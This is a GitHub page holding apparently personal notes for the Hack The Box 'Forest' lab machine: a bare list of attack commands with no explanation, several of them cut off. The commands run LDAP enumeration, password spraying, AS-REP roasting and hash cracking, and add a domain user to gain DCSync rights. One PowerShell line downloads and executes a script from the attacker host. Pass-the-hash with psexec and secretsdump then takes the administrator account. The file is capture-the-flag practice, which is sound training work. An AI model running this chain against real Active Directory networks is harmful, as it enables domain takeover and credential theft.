-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathFOREST
More file actions
56 lines (31 loc) · 2.03 KB
/
FOREST
File metadata and controls
56 lines (31 loc) · 2.03 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
ldapsearch -h 10.10.10.161 -x -s base namingcontexts
ldapsearch -h 10.10.10.161 -x -b "DC=htb,DC=local"
ldapsearch -h 10.10.10.161 -x -b "DC=htb,DC=local" > ldapanon.out
ldapsearch -h 10.10.10.161 -x -b "DC=htb,DC=local" '(objectClass=user)' sAMAccountName | grep>
crackmapexec smb 10.10.10.161 -u /home/npe/Documents/HTB/lab/forest/userlist.txt -p /usr/shar>
for i in $(cat pwlist.txt); do echo $i; echo ${i}2019; echo ${i}2020; done > t
hashcat --force --stdout pwlist.txt -r /usr/share/hashcat/rules/best64.rule -r /usr/share/has>
python3 GetNPUsers.py -dc-ip 10.10.10.161 -request 'htb.local/'
hashcat -m 18200 svcalfrescohash.txt /usr/share/wordlists/rockyou.txt.gz -r /usr/share/hashca>
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
sudo impacket-smbserver test $(pwd) -smb2support -user test -password test123
$pass = convertto-securestring 'test123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('test', $pass)
New-PSDrive -Name test -PSProvider FileSystem -Credential $cred -Root \\10.10.14.3\test
neo4j console
BloodHound --no-sandbox
sharphound.exe....
New-PSDrive -Name test -PSProvider FileSystem -Credential $cred -Root \\10.10.14.3\test
cd test:
.\SharpHound.exe -c all
net user cman CaveFormation /add /domain
net group "Exchange Windows Permissions"
net group "Exchange Windows Permissions" /add cman
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/PowerView.ps1')
$pass = convertto-securestring 'CaveFormation' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('HTB\cman', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb, DC=local" -PrincipalIdentity >
32693b11e6aa90eb43d32c72a07ceea6
crackmapexec smb 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6
python3 psexec.py -hashes 32693b11e6aa90eb43d32c72a07ceea6:32693b11e6aa90eb43d32c72a07ceea6 administrator@10.10.10.161
python3 secretsdump.py htb.local/administrator@10.10.10.161 -hashes 32693b11e6aa90eb43d32c72a07ceea6:32693b11e6aa90eb43d32c72a07ceea6